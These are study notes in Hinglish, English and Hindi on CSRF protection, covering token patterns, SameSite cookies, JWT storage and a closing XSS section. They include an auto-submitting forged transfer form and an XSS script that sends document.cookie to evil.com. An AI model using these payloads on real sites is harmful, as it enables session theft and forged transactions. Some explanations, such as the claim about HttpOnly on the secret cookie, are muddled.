 * ================================
 * COMPLETE CSRF NOTES (Learning Purpose)
 * ================================
 *
 * 1) CSRF KYA HAI?
 * --------------------------------
 * CSRF (Cross-Site Request Forgery) ek attack hai jisme attacker
 * victim ke browser ka use karke kisi trusted website (jaise bank.com)
 * par unwanted request bhej deta hai.
 *
 * Condition:
 * - Victim already login ho
 * - Browser automatically session cookie attach kare
 *
 * --------------------------------------------------
 *
 * 2) CSRF ATTACK KA BASIC FLOW
 * --------------------------------
 * 1. User bank.com par login hai.
 * 2. User evil.com open karta hai.
 * 3. evil.com hidden form ya request ke through bank.com ko POST bhejta hai.
 * 4. Browser automatically bank.com ki cookies attach kar deta hai.
 * 5. Agar CSRF protection nahi hai → attack successful.
 *
 * --------------------------------------------------
 *
 * 3) CSRF PROTECTION KA CORE IDEA
 * --------------------------------
 * Server har user/session ke liye ek unique secret generate karta hai.
 *
 * Is secret se:
 *   - Ek _csrf cookie generate hoti hai (secret store hota hai)
 *   - Ek CSRF token generate hota hai (frontend me use hota hai)
 *
 * Jab request aati hai:
 *   - Server cookie ka secret leta hai
 *   - Request se token leta hai
 *   - Dono ka relation verify karta hai
 *
 * Match → Success
 * Not Match → Reject
 *
 * --------------------------------------------------
 *
 * 4) IMPORTANT SECURITY TRUTH
 * --------------------------------
 * Hacker victim ke browser ka _csrf secret nahi jaanta.
 *
 * Kyun?
 * - Same-Origin Policy
 * - Cookies domain-bound hoti hain
 * - Har user ko alag secret milta hai
 * - Secret random aur cryptographically strong hota hai
 *
 * --------------------------------------------------
 *
 * 5) COOKIE BEHAVIOR (IMPORTANT)
 * --------------------------------
 * Jab request bank.com ko jaati hai:
 *   - Sirf bank.com ki cookies attach hoti hain
 *   - evil.com ki cookies nahi jaati
 *
 * Agar 100 cookies bank.com ki stored hain
 * aur domain + path match karta hai
 * to sab cookies attach ho sakti hain.
 *
 * --------------------------------------------------
 *
 * 6) COOKIE ATTRIBUTES (SECURITY VIEW)
 * --------------------------------
 *
 * Name=Value
 * Domain
 * Path
 * Expires / Max-Age
 * Secure
 * HttpOnly
 * SameSite
 *
 * --------------------------------
 * HttpOnly:
 * - JS se access nahi hoti
 * - XSS me session theft se bachata hai
 *
 * Secure:
 * - Sirf HTTPS me send hoti hai
 *
 * SameSite:
 * - CSRF me helpful
 *
 * SameSite=Strict
 *   → Cross-site request me cookie nahi jayegi
 *
 * SameSite=Lax
 *   → Some cross-site GET me jayegi
 *
 * SameSite=None
 *   → Cross-site me bhi jayegi (Secure required)
 *
 * --------------------------------------------------
 *
 * 7) SameSite vs CSRF Token
 * --------------------------------
 * SameSite:
 *   - Browser-level protection
 *   - Cookie attach hone se pehle check hota hai
 *
 * CSRF Token:
 *   - Server-level verification
 *   - Browser version pe depend nahi karta
 *   - Most reliable protection
 *
 * Real world me dono use kiye jate hain.
 *
 * --------------------------------------------------
 *
 * 8) CORS vs CSRF (CONFUSION CLEAR)
 * --------------------------------
 * CORS:
 *   - JS ko response read karne deta ya block karta hai
 *   - Cookie attach hone ko control nahi karta
 *
 * CSRF:
 *   - Cookie auto-attach behavior ka misuse karta hai
 *
 * Even agar:
 *   app.use(cors())
 * ho,
 * tab bhi CSRF possible hai agar token validation nahi hai.
 *
 * --------------------------------------------------
 *
 * 9) CSRF TOKEN KAHAN SET HOTA HAI?
 * --------------------------------
 * CSRF token frontend me:
 *
 * - Hidden input field me
 * - Meta tag me
 * - JavaScript variable me
 *
 * Example:
 * <input type="hidden" name="_csrf" value="TOKEN">
 *
 * --------------------------------------------------
 *
 * 10) REQUEST ME TOKEN KAHAN SE AA SAKTA HAI?
 * --------------------------------
 * CSRF middleware usually token check karta hai:
 *
 * 1. req.body._csrf
 * 2. req.query._csrf
 * 3. req.headers['csrf-token']
 * 4. req.headers['xsrf-token']
 * 5. req.headers['x-csrf-token']
 * 6. req.headers['x-xsrf-token']
 *
 * Default field name often: "_csrf"
 *
 * --------------------------------------------------
 *
 * 11) DOUBLE SUBMIT COOKIE PATTERN
 * --------------------------------
 * Ek cookie me secret hota hai.
 * Ek token request body/header me hota hai.
 * Server dono compare karta hai.
 *
 * --------------------------------------------------
 *
 * 12) PER USER SECRET CONCEPT
 * --------------------------------
 * Har user/session ke liye:
 *
 * User A → SECRET_A
 * User B → SECRET_B
 * Hacker → SECRET_H
 *
 * Secret alag hone ki wajah se:
 * Hacker ka token victim ke secret se match nahi karega.
 *
 * --------------------------------------------------
 *
 * 13) FINAL SECURITY SETUP (RECOMMENDED)
 * --------------------------------
 *
 * Set-Cookie:
 *   Secure;
 *   HttpOnly;
 *   SameSite=Strict;
 *   Path=/;
 *
 * + CSRF Token Validation
 *
 * Layered security approach use karna chahiye.
 *
 * --------------------------------------------------
 *
 * FINAL CONCLUSION
 * --------------------------------
 * CSRF attack isliye fail hota hai kyunki:
 * Attacker victim ke browser ka secret nahi jaanta.
 *
 * SameSite helpful hai.
 * Lekin CSRF token verification sabse reliable protection hai.
 *

===========================English version========================================

 * Assume there is a website called bank.com where an authentic user has created an account.
 * There is another website called evil.com which is controlled by a hacker.
 *
 * Main Scenario:
 *
 * Step 1:
 * When the user first opens bank.com in the browser,
 * the server generates a _csrf cookie and stores it in the user's browser.
 * At the same time, a CSRF token is generated and inserted into the frontend page.
 *
 * Step 2:
 * The user logs in to bank.com from the same browser.
 * During login, a request is sent to bank.com.
 * Along with this request:
 *   - The previously generated _csrf cookie is automatically sent.
 *   - The CSRF token (from the frontend) is also sent.
 *
 * The server then verifies the relationship between:
 *   - The _csrf cookie (secret)
 *   - The CSRF token
 *
 * If the relation matches → Success
 * If not → Request fails
 *
 * In the authentic user's case, it matches successfully.
 *
 * ---------------------------------------------------------
 *
 * Now consider the attack scenario:
 *
 * The user is already logged in to bank.com.
 * So the user's browser already contains:
 *   - A valid _csrf cookie
 *   - A valid CSRF token (on the frontend)
 *
 * Now the user accidentally opens evil.com.
 *
 * As soon as evil.com loads, it internally sends a request to bank.com.
 * This means a request reaches the bank.com server,
 * but that request originated from evil.com.
 *
 * Suppose the hacker manually sets any random CSRF token
 * in the request header and sends it to bank.com.
 *
 * Now what happens in the browser?
 *
 * The browser checks the destination domain of the request.
 * Since the request is going to bank.com,
 * the browser will attach bank.com cookies (if they exist).
 *
 * So the request received by bank.com server contains:
 *   - A CSRF token created by the hacker (fake token)
 *   - The real _csrf cookie stored in the user's browser
 *
 * Now the server verifies the relation between:
 *   - The secret inside the user's _csrf cookie
 *   - The CSRF token sent in the request
 *
 * This relation will NOT match,
 * because the hacker's token was generated using a different secret.
 *
 * Therefore, the request is rejected.
 *
 * ---------------------------------------------------------
 *
 * Important Observation:
 *
 * The hacker does not know the _csrf secret stored in the user's browser.
 * That secret was generated by bank.com when the frontend was first loaded.
 *
 * If the hacker opens bank.com on his own laptop,
 * bank.com will generate a completely different _csrf cookie and secret for him.
 *
 * Since the secret is different for every user/session,
 * the token generated on the hacker's system will not match
 * the secret stored in the victim user's browser.
 *
 * Conclusion:
 *
 * bank.com generates a different _csrf secret for each user.
 * Because of this, even if the hacker generates a valid token
 * using his own secret, it will not work for another user.



=================================Hindi Version===========================================

 * मान लो एक वेबसाइट है bank.com, जहाँ एक authentic user ने अपना अकाउंट बनाया हुआ है।
 * और एक दूसरी वेबसाइट है evil.com, जो hacker के कंट्रोल में है।
 *
 * मुख्य स्थिति:
 *
 * Step 1:
 * जब user पहली बार bank.com अपने browser में खोलता है,
 * तब server एक _csrf cookie generate करता है और उसे user के browser में store कर देता है।
 * साथ ही एक CSRF token भी generate होता है,
 * जिसे bank.com के frontend page में insert किया जाता है।
 *
 * Step 2:
 * अब user उसी browser से bank.com पर login करता है।
 * जब login request server को जाती है, तब:
 *   - _csrf cookie automatically request के साथ server को भेजी जाती है।
 *   - CSRF token भी request के साथ भेजा जाता है।
 *
 * इसके बाद server यह verify करता है कि:
 *   - _csrf cookie में जो secret है
 *   - और request में आया हुआ CSRF token
 *   इनके बीच सही संबंध (relation) है या नहीं।
 *
 * अगर relation match करता है → request successful
 * अगर match नहीं करता → request reject
 *
 * Authentic user के case में relation match हो जाता है,
 * इसलिए login सफल होता है।
 *
 * ---------------------------------------------------------
 *
 * अब attack की स्थिति समझते हैं:
 *
 * User पहले से ही bank.com पर login है।
 * इसलिए उसके browser में:
 *   - एक valid _csrf cookie मौजूद है
 *   - और frontend में एक valid CSRF token भी है।
 *
 * अब user गलती से evil.com खोल देता है।
 *
 * जैसे ही evil.com खुलता है,
 * वह internally bank.com को एक request भेज देता है।
 * यानी bank.com server तक एक request पहुँच जाती है,
 * लेकिन वह request evil.com से initiate हुई है।
 *
 * मान लो hacker ने अपनी तरफ से कोई भी random CSRF token
 * request header में set कर दिया।
 *
 * अब browser क्या करेगा?
 *
 * Browser request के destination domain को check करेगा।
 * क्योंकि request bank.com को जा रही है,
 * इसलिए browser bank.com की cookies (अगर मौजूद हैं) automatically attach कर देगा।
 *
 * अब bank.com server को जो request मिलेगी उसमें:
 *   - CSRF token होगा (जो hacker ने भेजा है)
 *   - और _csrf cookie होगी (जो user के browser में पहले से store थी)
 *
 * अब server इन दोनों का relation verify करेगा।
 *
 * लेकिन relation match नहीं करेगा,
 * क्योंकि hacker का token किसी दूसरे secret से generate हुआ है,
 * जबकि user की _csrf cookie में अलग secret है।
 *
 * इसलिए request reject हो जाएगी।
 *
 * ---------------------------------------------------------
 *
 * सबसे महत्वपूर्ण बात:
 *
 * Hacker को user के browser में stored _csrf secret का पता नहीं होता।
 * वह secret तब generate हुआ था जब bank.com पहली बार user के browser में load हुआ था।
 *
 * अगर hacker अपने laptop पर bank.com खोलेगा,
 * तो server उसे एक अलग _csrf cookie और अलग secret देगा।
 *
 * यानी हर user/session के लिए server अलग _csrf secret generate करता है।
 *
 * इसी कारण:
 *   - Hacker अपने system पर जो token generate करेगा,
 *   - वह victim user के secret से match नहीं करेगा।
 *
 * निष्कर्ष:
 *
 * bank.com हर user के लिए अलग _csrf secret generate करता है।
 * इसलिए hacker दूसरे user के लिए valid CSRF token generate नहीं कर सकता।

=================================================================================

/*
Tum bol rahe ho:

Double submit me dono jagah same token nahi hota
Cookie me secret hota hai
Frontend me token hota hai

👉 Ye har case me sahi nahi hai.
Ye depend karta hai kaunsa pattern use ho raha hai.


 Double Submit Cookie Pattern (Original Version)

Is pattern me:

✔ Server ek random token generate karta hai
✔ Wahi SAME token:

   - Cookie me store karta hai
   - Frontend ko deta hai (header/body ke liye)

Example:

Cookie:
csrfToken=abc123

Frontend request bhejta hai:

Header:
X-CSRF-Token: abc123

Server check karta hai:

cookie.csrfToken === header.csrfToken ?

✔ Bas simple equality check hota hai
✔ Koi alag secret yaha use nahi hota
✔ SAME token dono jagah hota hai

Isliye iska naam hai: Double Submit


Tum Jo Bol Rahe Ho Wo Kya Hai?

Tum jis pattern ki baat kar rahe ho wo hai:

Secret-Based Derived Token Pattern

Isme:

1️⃣ Cookie me secret hota hai
2️⃣ Server us secret se token generate karta hai
3️⃣ Frontend ko derived token diya jata hai
4️⃣ Server secret se dobara token generate karke verify karta hai

Yaha:

❌ Same value dono jagah nahi hoti
 Cryptographic relation hota hai (secret → token)


 Dono Pattern Ka Clear Difference

Pattern:          Double Submit
Cookie Me:        Token
Frontend Me:      Same Token
Verification:     Equality check

Pattern:          Secret Derived
Cookie Me:        Secret
Frontend Me:      Derived Token
Verification:     Re-generate & compare


 Important Clarity

Tumne jo bola:

"Cookie me secret hota hai, token nahi"

✔ Ye secret-based pattern ke liye sahi hai

Lekin classic double submit me:

✔ Cookie me bhi token hota hai
✔ Header me bhi same token hota hai


 Simple Analogy

Double Submit:

Pocket me number 123
Haath me number 123
Server bolta hai: dono match karo


Secret-Based:

Pocket me master key 
Haath me us key se bana temporary code 
Server key se dobara code banake compare karta hai


 Final Clear Line

Tum galat nahi the.
Bas tum ek different CSRF pattern describe kar rahe the.

Double submit = same token both places
Secret-based = secret cookie + derived token

Dono valid approaches hain.
*/

=================================================================================
==============================
CSRF Internal Working (Notes)
==============================

1️⃣ Server First Step

- Server ek random "secret" generate karta hai.
- Ye secret browser ki cookie me store kiya jata hai.
- Ye secret client ko directly expose nahi kiya jata for usage.
- Example:

    csrfSecret = a9x82kLmQp   (stored in cookie)


2️⃣ Token Generation

- Server isi secret se ek CSRF token generate karta hai.
- Token usually secret ka hash hota hai (same algorithm use hota hai).
- Example:

    token = hash(csrfSecret)
    token = XyZ123

- Ye token frontend ko response me send kiya jata hai.


3️⃣ Frontend Responsibility

- Frontend token ko memory/state me store karta hai.
- Jab bhi POST / PUT / PATCH / DELETE request bheji jati hai,
  to ye token header ya body me attach kiya jata hai.

Example:

    Headers:
    X-CSRF-Token: XyZ123


4️⃣ Request Time Flow

Jab client request bhejta hai:

- Browser automatically cookie bhej deta hai:
      csrfSecret = a9x82kLmQp

- Frontend manually (code ke through) token bhejta hai:
      X-CSRF-Token: XyZ123


5️⃣ Server Verification Process

Server ke paas ab 2 cheezein hoti hain:

A. Cookie se secret:
      a9x82kLmQp

B. Header se token:
      XyZ123

Server internally:

    expectedToken = hash(csrfSecret)

Phir compare karta hai:

    expectedToken === tokenFromFrontend

✔ Agar match hua → Request Allowed
❌ Agar match nahi hua → 403 CSRF Error


6️⃣ Hacker Fail Kyun Hota Hai?

- Hacker victim ke browser ki cookie read nahi kar sakta (Same-Origin Policy).
- Isliye usko csrfSecret nahi pata hota.
- Secret ke bina valid token generate nahi kar sakta.
- Result → Token mismatch → Request rejected.


=========================================
Final Concept Summary
=========================================

CSRF Protection = Cookie Secret + Derived Token Verification

Server verify karta hai ki:
"Frontend se aaya token kya isi secret se bana hai?"

Agar haan → Valid Request
Agar nahi → Block

User ko manually kuch pata nahi hota.
Sab process internally hota hai.
================================================================

1️⃣ Server kya karta hai (pehli baar)

Server ek random secret generate karta hai
(example: a9x82kLmQp)

Ye secret cookie me store karta hai

Cookie:
csrfSecret = a9x82kLmQp

👉 ye cookie HttpOnly nahi hoti, kyunki server ko verify karna hota hai

2️⃣ Server us secret se TOKEN banata hai

Example:

token = hash(csrfSecret)

Maan lo:

token = H(a9x82kLmQp) = XyZ123
3️⃣ Ye token frontend ko deta hai
res.json({
  csrfToken: "XyZ123"
});

Frontend is token ko:

hidden input

header (x-csrf-token)

ya JS variable
me store karta hai

4️⃣ Jab user request bhejta hai (POST / PUT / DELETE)

Browser automatically:

cookie bhej deta hai

csrfSecret = a9x82kLmQp

Frontend manually (code ke through):

token bhejta hai

X-CSRF-Token: XyZ123

⚠️ User ko kuch pata bhi nahi hota, sab internally hota hai

5️⃣ Ab SERVER VERIFY kaise karta hai (IMPORTANT PART)

Server ke paas ab 2 cheez aa gayi:

🔹 A. Cookie se secret
a9x82kLmQp
🔹 B. Frontend se token
XyZ123
🔁 Server kya karta hai?

Server same algorithm dobara chalata hai 👇

expectedToken = hash(csrfSecret)
expectedToken = hash(a9x82kLmQp)
expectedToken = XyZ123
✅ Compare karta hai
expectedToken === tokenFromFrontend

✔️ same → request VALID

❌ different → request REJECT (403 CSRF error)

🧨 Hacker yahan fail kyun hota hai?
Hacker ke paas kya hota hai?

❌ cookie ka secret nahi

❌ valid token nahi

Hacker kya karta hai?

sirf fake POST request

browser cookie bhej deta hai ✔️

token generate nahi kar sakta ❌

👉 isliye relation match hi nahi hota

 Tumhara conclusion bilkul correct tha

Tumne jo likha 👇

server cookies se secret lega
us secret se token banayega
frontend se aaye token se compare karega

 -- YE 100% SAHI HAI 

Tum CSRF ka real internal mechanism samajh chuke ho.

- Ek line me final yaad rakhna

CSRF protection = Cookie (secret) + Request token (derived from secret)
Relation match hua → request allowed

====================================================================
Sabse pehle ek line ka CORE RULE

CSRF attack tabhi possible hai jab attacker tumhare browser se request bhejwa sake WITHOUT tumhari permission.

Ab main bataunga:

Ye kab possible hota hai

Kab possible nahi hota

Aur kyu

Step-by-Step Core Mechanism
Goal of attacker

Attacker chahta hai:

Tumhare account se koi action ho jaye


Jaise:

Money transfer

Password change

Email change

Case 1: Jab Cookie use ho rahi ho (AUTO SEND)

Tum login ho:

bank.com


Browser me cookie saved hai:

sessionId=abc123


Ab tum evil site open karte ho:

evil.com


Us site me hidden code hai:

<form action="https://bank.com/transfer" method="POST">
  <input name="amount" value="5000">
</form>

<script>
 document.forms[0].submit()
</script>

 Yaha asli magic hota hai

Browser sochta hai:

Request bank.com ko ja rahi hai
Mere paas uski cookie hai
Main automatically attach kar deta hoon

Aur request ban jati hai:

POST /transfer
Cookie: sessionId=abc123

Server kya dekhta hai?

Server ko kya dikh raha hai?

Valid sessionId ✔

Logged in user ✔

Server kya sochega?

Ye Vivek hi hai

Aur action ho jayega 😨

 CORE LOGIC

Attacker ne:

Cookie chori nahi ki

Password nahi pata

Sirf:

Tumhare browser ko use karke request bhej di

Aur browser ne:

Apne aap credentials attach kar diye

Yahi CSRF ka janam hai.

 Case 2: Jab LocalStorage + Header use ho

Ab maan lo JWT localStorage me hai:

localStorage:
token = xyz123


Aur request aise jati hai:

Authorization: Bearer xyz123


IMPORTANT POINT 👇

Browser:

LocalStorage ko auto attach nahi karta

Header khud se nahi banata

Ab attacker kya karega?

evil.com se request bhejega:

POST /transfer


But header nahi hoga:

Authorization: ❌ missing


Server bolega:

User ka token kahan hai?

Request reject ❌

CORE DIFFERENCE (Sabse important)
Situation	Browser kya karta hai?	Result
Cookie	Auto attach	CSRF possible
LocalStorage	Auto attach nahi	CSRF fail
 Deep Core Truth

CSRF ka relation:

Cookie se nahi

Session se nahi

JWT se nahi

CSRF ka relation sirf ek cheez se hai:

Browser automatically kya bhejta hai?

Real reason aur bhi deep hai

Browser ka design hi aisa hai:

Jab request jaye:

bank.com


To browser bolta hai:

Is domain ki cookies mere paas hain
Main bhej deta hoon

Browser ye check nahi karta:

Request bank.com se aayi?

Ya evil.com se?

Ye hi vulnerability hai.

CSRF token ka kaam kya?

Server bolta hai:

Agar request asli page se aayi hai, to ek secret code bhi bhejo

Attacker:

Ye secret nahi jaanta

Isliye request fail

Ekdum RAW core analogy

Socho:

Tumhare ghar ka darwaza fingerprint se khulta hai.

Tum ghar me ho.

Koi bahar wala:

Tumhara haath pakad ke

Fingerprint machine pe rakh de

Door open ho jayega.

Machine sochegi:

Fingerprint match ho gaya

Ye hi CSRF hai.

Fingerprint = Cookie
Tumhara haath = Browser

Ab main tumse ek core logical sawaal poochta hoon

Dhyaan se soch ke jawab dena:

Agar browser cookies automatically send hi na kare kabhi,
to kya CSRF naam ki cheez exist karti?

Yes ya No?

=============================================================================
Agar browser kabhi bhi cookies/credentials automatically send na karta, to classic CSRF exist hi nahi karta.

Core logic ko 4 bullets me seal kar lo

CSRF ka engine = browser ka auto-attach behavior
Jab request kisi domain par jati hai, browser us domain ki cookies khud se laga deta hai.
Attacker isi auto-attach ko misuse karta hai.

Attack kaise hota hai (essence)

Victim login hai → browser me cookie already saved.

Victim evil site kholta hai → wo site bank.com ko request bhejwa deti hai.

Browser: “ye bank.com ke liye request hai” → cookie auto-attach.

Server: valid cookie dikhi → action allow.

LocalStorage me kyun nahi hota
LocalStorage ki value browser khud se request me nahi jodta.
Jab tak tum JS se Authorization header add na karo, token nahi jata.
Evil site tumhara header bana nahi sakti → request me credentials missing → server reject.

JWT ko cookie me rakhne par CSRF kyun wapas aata
Kyunki JWT bhi phir cookie ban gaya.
Cookie = auto-attach.
Auto-attach = attacker tumhare browser se request bhejwa sakta hai.
Isliye JWT-in-cookie ke saath CSRF protection lagate hain.

Ek line ka master rule

Auto-send credentials (cookie) → CSRF possible

Manual-send credentials (header/localStorage) → CSRF fail

===============================================================================================

# CSRF & XSS – Deep Notes (Core Understanding)

---

## PART 1 — BASIC IDENTITY FLOW

Web security me 2 alag cheezein hoti hain:

1. User kaun hai?  → Identity

   * Session
   * Session ID
   * Cookie
   * JWT

2. Request kisne bheji? → Intent / Authenticity

   * CSRF Token

Cookie / Session batata hai:
→ Ye Vivek hi hai

CSRF token batata hai:
→ Request Vivek ne khud bheji hai

---

## PART 2 — COOKIE CORE LOGIC

Cookie browser level pe domain specific hoti hai.
Tab specific nahi hoti.

Example:

Laptop → Chrome → bank.com login

Browser ke paas:
sessionId=abc123

Ab:

Tab1 me login kiya
Tab2 me bank.com open kiya

Browser check karega:
"Kya mere paas bank.com ki cookie hai?"

Answer:
→ Haan

To automatically attach kar dega.

Isliye user ko dobara login nahi karna padta.

---

## PART 3 — DIFFERENT DEVICES / BROWSERS

Cookies shared nahi hoti:

Laptop 1 → Chrome → login
Laptop 2 → Chrome → login again required
Laptop 1 → Edge → login again required

Reason:
Har browser ka storage alag hota hai.

---

## PART 4 — CSRF ATTACK CORE LOGIC

CSRF tab hota hai jab:

Browser automatically credentials bhejta hai.

Example flow:

1. User bank.com me login hai
2. Cookie valid hai
3. Hacker evil.com ka link bhejta hai
4. User galti se click karta hai
5. Evil page bank.com ko request bhejta hai
6. Browser check karta hai:
   "Kya mere paas bank.com ki cookie hai?"
7. Haan → cookie attach ho jati hai
8. Server sochega:
   "Valid user hai"
9. Action perform ho jayega

Yahi CSRF attack hai.

Core issue:
→ Browser bina puche cookie bhej deta hai.

---

## PART 5 — CSRF TOKEN KA REAL KAAM

CSRF token prove karta hai:

Request real page se hi aayi hai.

Server kya karta hai:

1. User login karta hai
2. Server ek random CSRF token generate karta hai
3. Ek copy server pe store hoti hai
   (session / memory / DB)
4. Ek copy page me insert hoti hai:

   * hidden form field
   * JS variable
   * meta tag

Request jab aati hai:

Server check karta hai:

Token (request) === Token (server)?

Match:
→ Accept

Mismatch:
→ Reject

Attacker ke paas token nahi hota.

---

## PART 6 — CSRF TOKEN KAHAN STORE HOTA HAI

Server side:

* Session me
* Memory me
* Kabhi DB me

Client side:

* Page ke andar embed hota hai
* Form field
* JS variable
* Meta tag

Important:
Token cookie jaisa auto-send nahi hota.
User ka real page hi token send karta hai.

---

## PART 7 — KYUN EVIL.COM TOKEN NAHI PADH SAKTA

Same Origin Policy:

evil.com:

* bank.com ka page read nahi kar sakta
* bank.com ka JS variable nahi dekh sakta
* bank.com ka meta tag nahi padh sakta

Isliye token chori nahi hota.

---

## PART 8 — JWT STORAGE & CSRF

JWT agar cookie me rakha:

→ Browser auto send karega
→ CSRF risk

JWT agar localStorage me rakha:

→ Browser auto send nahi karega
→ JS manually header me bhejega
→ CSRF risk nahi

---

## PART 9 — LOCALSTORAGE VS COOKIE

localStorage:

* Domain specific
* Auto send nahi hota

Cookie:

* Domain specific
* Auto send hota hai

Isi auto-send ki wajah se CSRF hota hai.

---

## PART 10 — HTTPONLY COOKIE

HttpOnly ka matlab:

JavaScript cookie read nahi kar sakti.

Example:

document.cookie
→ HttpOnly cookie nahi dikhegi

Protection:
→ XSS se bachata hai

Lekin:

Browser fir bhi cookie send karega.

Isliye:
→ CSRF se nahi bachata

---

## PART 11 — XSS ATTACK CORE LOGIC

XSS me hacker:

Website ke andar JS inject kar deta hai.

Example:

Comment box me likh diya:

<script>
fetch("https://evil.com/steal?c=" + document.cookie)
</script>

Server usko save kar leta hai.

Jab koi user page open karega:

Browser script run karega.

Hacker:
→ Cookie chura lega
→ Session hijack kar lega

---

## PART 12 — HTTPONLY VS XSS

Agar cookie HttpOnly ho:

document.cookie
→ empty

Cookie chori nahi hogi.

But:

Hacker user ke browser se actions kara sakta hai.

---

## PART 13 — CSRF VS XSS DIFFERENCE

CSRF:

* Browser auto cookie bhejta hai
* Attacker request karwata hai

XSS:

* Hacker JS inject karta hai
* Browser control me le leta hai

---

## PART 14 — TYPES OF XSS

1. Stored XSS

   * DB me save
   * Sab users affect

2. Reflected XSS

   * URL se inject

3. DOM XSS

   * Frontend JS manipulation

---

## PART 15 — XSS SE BACHNE KE RULES

1. User input sanitize karo
2. Raw HTML render mat karo
3. HttpOnly cookies use karo
4. CSP (Content Security Policy)
5. Output encoding

---

## PART 16 — CSRF SE BACHNE KE RULES

1. CSRF token use karo
2. SameSite cookies use karo
3. Sensitive action me POST use karo
4. Origin / Referer verify karo

---

## FINAL CORE SUMMARY

Cookie / Session:
→ Kaun user hai

CSRF Token:
→ Request kisne bheji

HttpOnly:
→ JS se cookie protect

XSS:
→ JS injection

CSRF:
→ Auto cookie misuse
